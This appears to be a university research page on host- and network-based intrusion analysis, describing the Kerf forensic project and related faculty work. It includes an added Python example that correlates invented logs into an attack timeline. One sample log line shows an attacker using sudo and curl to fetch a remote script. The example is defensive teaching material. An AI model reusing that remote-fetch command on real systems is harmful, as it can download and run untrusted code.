Faculty involved in this effort include:
• Javed Aslam (CCIS)
• Jennifer Dy (ECE)
• Donghui Zhang (CCIS)
A central problem in Information Assurance is host- and network-based intrusion detection and analysis. All sizable computer networks employ host- and network-based sensors to monitor the
health of the network and to detect and/or prevent intrusions. The output of these "sensors" can
be as simple as host and/or network logs, or it may consist of higher-level information such as the
alerts generated by a firewall or intrusion detection system. In real-world settings, the amount of
data that is collected and must be analyzed can be staggering; sophisticated database, data mining,
machine learning, and information retrieval tools are necessary to intelligently process such data.
Javed Aslam's primary research areas are Machine Learning and Information Retrieval, and for three years he has been involved in the Kerf project, whose goal is to apply tools from Machine Learning and Information Retrieval to the problem of the forensic analysis of host- and network-based logs.
Specifically, the thesis of the Kerf project is that regardless of the quality of an intrusion-detection system, human experts are still necessary to analyze intrusion alerts and to determine the
nature of an attack. Human experts are also the key tool for identifying, tracking, and disabling
new forms of attack. Often this involves experts from many organizations working together to share
their observations, hypotheses, and attack signatures. Unfortunately, today these experts have few
tools that help them to automate this process.
Unlike the numerous existing intrusion-detection tools, which are designed for real-time system and network monitoring, the focus of the Kerf project is on intrusion analysis after the fact, where the challenge is finding all data relevant to an intrusion in large amounts of logged data in order to hypothesize the full chain of intrusion events. The goal of the Kerf project is to build automated tools that help security experts and system administrators to:
1. Identify the characteristics of an attack given data from host- and network-based sensors.
2. Develop a hypothesis about the nature and origin of the attack.
3. Assist the user by automatically refining and extrapolating that hypothesis.
4. Share that hypothesis with security managers from other sites.
5. Test that hypothesis at those other sites and coordinate the results of testing.
6. Archive the data necessary for use as evidence in later law enforcement actions.
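To make the after-the-fact analysis problem behind goals 1 to 3 concrete, here is an added example; it is not Kerf's code and not the work of any of the faculty named above. It starts from one indicator taken from an alert (an external IP address), then pivots through host and network log lines, pulling in every event that shares an indicator (IP address or user name) with what has already been collected, and orders the result into a timeline that a human analyst can read as a hypothesis about the chain of events. The log lines, host names, addresses and the stoplist of internal addresses are all constructed for this example; the stoplist is an analyst's choice, not something the page describes.

```python
"""Pivot-based correlation of host and network logs around a seed indicator
(illustrative example; the log data below is invented)."""
import re
from datetime import datetime

# Constructed host log (sshd/sudo style) for host1 = 10.0.0.5, host2 = 10.0.0.9.
HOST_LOG = """\
2024-03-04T02:14:05 host1 sshd[4021]: Failed password for invalid user admin from 203.0.113.7 port 51022
2024-03-04T02:14:09 host1 sshd[4021]: Failed password for backup from 203.0.113.7 port 51023
2024-03-04T02:15:31 host1 sshd[4025]: Accepted password for backup from 203.0.113.7 port 51040
2024-03-04T02:16:02 host1 sudo: backup : COMMAND=/usr/bin/curl http://198.51.100.23/x.sh
2024-03-04T02:16:10 host1 sshd[4030]: Accepted publickey for alice from 192.0.2.44 port 60211
2024-03-04T03:01:00 host2 sshd[7001]: Accepted password for backup from 10.0.0.5 port 40100
"""

# Constructed firewall log for the same period.
NET_LOG = """\
2024-03-04T02:14:04 fw ALLOW TCP 203.0.113.7:51022 -> 10.0.0.5:22
2024-03-04T02:16:03 fw ALLOW TCP 10.0.0.5:45120 -> 198.51.100.23:80
2024-03-04T02:16:09 fw ALLOW TCP 192.0.2.44:60211 -> 10.0.0.5:22
2024-03-04T03:00:59 fw ALLOW TCP 10.0.0.5:40100 -> 10.0.0.9:22
"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# User names as sshd and sudo print them: "for [invalid user] NAME from", "sudo: NAME :"
USER = re.compile(r"(?:for (?:invalid user )?|sudo: )(\w+)(?= from | :)")


def parse(line, source):
    """Split a log line into a timestamp and a set of typed indicators."""
    ts_str, rest = line.split(" ", 1)
    indicators = {("ip", ip) for ip in IPV4.findall(rest)}
    indicators |= {("user", u) for u in USER.findall(rest)}
    return {"ts": datetime.fromisoformat(ts_str), "source": source,
            "line": line, "indicators": frozenset(indicators)}


def load_events():
    events = [parse(l, "host") for l in HOST_LOG.splitlines() if l.strip()]
    events += [parse(l, "net") for l in NET_LOG.splitlines() if l.strip()]
    return events


def pivot(events, seed, stoplist=frozenset(), max_rounds=5):
    """Breadth-first pivot: events touching the current frontier join the case
    file, and their other indicators (minus the stoplist) form the next frontier.
    Returns the collected events in time order and every indicator discovered."""
    known = {seed}
    frontier = {seed}
    case = {}
    for _ in range(max_rounds):
        if not frontier:
            break
        new = set()
        for i, ev in enumerate(events):
            if i not in case and ev["indicators"] & frontier:
                case[i] = ev
                new |= ev["indicators"] - known - stoplist
        known |= new
        frontier = new
    timeline = sorted(case.values(), key=lambda e: e["ts"])
    return timeline, known


if __name__ == "__main__":
    events = load_events()
    seed = ("ip", "203.0.113.7")            # the address named in the alert
    internal = {("ip", "10.0.0.5"), ("ip", "10.0.0.9")}  # analyst's stoplist
    timeline, found = pivot(events, seed, stoplist=internal)
    for ev in timeline:
        print(ev["source"], ev["line"])
    print("indicators discovered:", sorted(found))
```

With the stoplist, the pivot gathers the brute-force attempts, the successful login as backup, the sudo curl to 198.51.100.23, the matching firewall record, and backup's later login to host2: seven events out of ten, in time order, with alice's unrelated session left out. Run without the stoplist, the victim's own address 10.0.0.5 matches every firewall line to or from that host, and one more round pulls in alice's login as well, so the case file grows to all ten events. That is the precision problem goal 3 is about: automatic extrapolation has to know which indicators are too common to pivot on, and here the price of excluding the internal addresses is that the firewall record of the hop to 10.0.0.9 (matched only by internal addresses) drops out and must be recovered by a more specific pivot, for example on the source port 40100 that both records share.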
Donghui Zhang and Jennifer Dy also conduct research which is highly relevant to problems in Information Assurance. Donghui Zhang's primary research area is Database Systems. In particular,
his research interests include temporal, spatial, and spatio-temporal database indexing; aggregation
queries and join processing; efficiently storing and querying XML documents which evolve
over time; data streaming; and mining generalized association rules. Given the volume of data that
is collected by host- and network-based systems, the efficient support of various data mining and
retrieval operations is critical, necessitating the study of the above techniques.
Jennifer Dy's primary research areas are Data Mining and Machine Learning, including probabilistic clustering and image retrieval. The techniques that she studies can be applied to automatic
data organization, data cleaning, and anomaly detection, and Data Mining and Machine Learning
techniques in general are highly relevant to the problems of intrusion detection and analysis from
vast quantities of sensor data.